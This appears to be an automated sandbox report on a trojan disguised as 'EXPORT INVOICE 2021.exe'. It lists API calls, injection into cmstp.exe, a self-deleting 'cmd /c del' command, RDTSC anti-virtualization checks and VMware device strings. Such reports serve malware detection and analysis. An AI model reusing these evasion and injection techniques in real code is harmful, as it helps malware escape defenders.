          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00408C80
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00402D89
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00402D90
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041CFD2
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00402FB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488B090
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04931002
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488841F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488D5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487F900
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04870D20
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04894120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04941D55
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04896E30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AEBB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4CBC5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4C383
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4B8C6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D32FB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D38C80
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D38C3A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D32D90
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D32D89
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 0487B150 appears 32 times
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_004185E0 NtCreateFile,
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00418690 NtReadFile,
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00418710 NtClose,
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_004187C0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041868A NtReadFile,
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041870A NtClose,
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_004187BB NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048BB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048BAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048BA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048BA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048BA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D48690 NtReadFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D487C0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D48710 NtClose,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D485E0 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4868A NtReadFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D487BB NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4870A NtClose,
          Source: EXPORT INVOICE 2021.exe, 00000000.00000000.671752764.0000000000A00000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCXGHo0w.exe> vs EXPORT INVOICE 2021.exe
          Source: EXPORT INVOICE 2021.exe, 00000002.00000002.797551448.0000000000B60000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCXGHo0w.exe> vs EXPORT INVOICE 2021.exe
          Source: EXPORT INVOICE 2021.exe, 00000002.00000002.798051676.0000000001299000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameCMSTP.EXE` vs EXPORT INVOICE 2021.exe
          Source: EXPORT INVOICE 2021.exe, 00000002.00000002.799092420.00000000017DF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs EXPORT INVOICE 2021.exe
          Source: EXPORT INVOICE 2021.exeBinary or memory string: OriginalFilenameCXGHo0w.exe> vs EXPORT INVOICE 2021.exe
          Source: EXPORT INVOICE 2021.exeVirustotal: Detection: 32%
          Source: EXPORT INVOICE 2021.exeMetadefender: Detection: 17%
          Source: EXPORT INVOICE 2021.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe'
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess created: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe {path}
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess created: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe {path}
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe'
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EXPORT INVOICE 2021.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@10/2
          Source: EXPORT INVOICE 2021.exe, 00000000.00000000.671512016.0000000000932000.00000002.00020000.sdmp, EXPORT INVOICE 2021.exe, 00000002.00000002.797206646.0000000000A92000.00000002.00020000.sdmpBinary or memory string: INSERT INTO RolPermiso(RolPermiso_rol, RolPermiso_permiso) VALUES (;Error - Nuevo - RolPermisoDAL
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6040:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: EXPORT INVOICE 2021.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: EXPORT INVOICE 2021.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmstp.pdbGCTL source: EXPORT INVOICE 2021.exe, 00000002.00000002.798051676.0000000001299000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: EXPORT INVOICE 2021.exe, 00000002.00000002.798456430.0000000001530000.00000040.00000001.sdmp, cmstp.exe, 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: EXPORT INVOICE 2021.exe, 00000002.00000002.798456430.0000000001530000.00000040.00000001.sdmp, cmstp.exe
          Source: Binary string: cmstp.pdb source: EXPORT INVOICE 2021.exe, 00000002.00000002.798051676.0000000001299000.00000004.00000020.sdmp
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041B822 push eax; ret
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041B82B push eax; ret
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041B88C push eax; ret
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00418AC1 push cs; retf
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00415AE6 push ecx; ret
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00415AF0 push ecx; ret
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_004152B2 push eax; retf
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0040861B push edi; iretd
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041CE9A push FFFFFFE5h; retf
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041B7D5 push eax; ret
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00A97A1F push esi; iretd
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00A94459 push cs; retf
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048CD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D48AC1 push cs; retf
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D45AF0 push ecx; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D45AE6 push ecx; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D452B2 push eax; retf
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4B88C push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4B822 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4B82B push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4D1CA pushfd ; iretd
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4CE9A push FFFFFFE5h; retf
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4BE49 push edi; iretd
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4BE75 push ebx; iretd
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D3861B push edi; iretd
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4B7D5 push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.07298793214

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe'
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe'
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000002D38604 second address: 0000000002D3860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000002D3899E second address: 0000000002D389A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe TID: 6708Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_004088D0 rdtsc
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000004.00000000.743466087.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.739552326.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.743466087.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.743692325.000000000A716000.00000004.00000001.sdmpBinary or memory string: 0d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&[
          Source: explorer.exe, 00000004.00000000.780087386.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&[
          Source: explorer.exe, 00000004.00000000.736762882.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000004.00000000.780087386.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000004.00000000.780087386.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_004088D0 rdtsc
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmstp.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04879080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0490B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0490B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0490B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0490B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0490B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0490B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04948CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_049314FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04944015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04944015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04931C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04931C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04931C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04931C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04931C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04931C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04931C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04931C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04931C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04931C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04931C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04931C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04931C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04931C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0494740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0494740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0494740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048ABC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0490C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0490C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04890050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04890050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04932073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04941074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0489746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0489C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04872D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04872D8A mov eax, dword ptr fs:[00000030h]
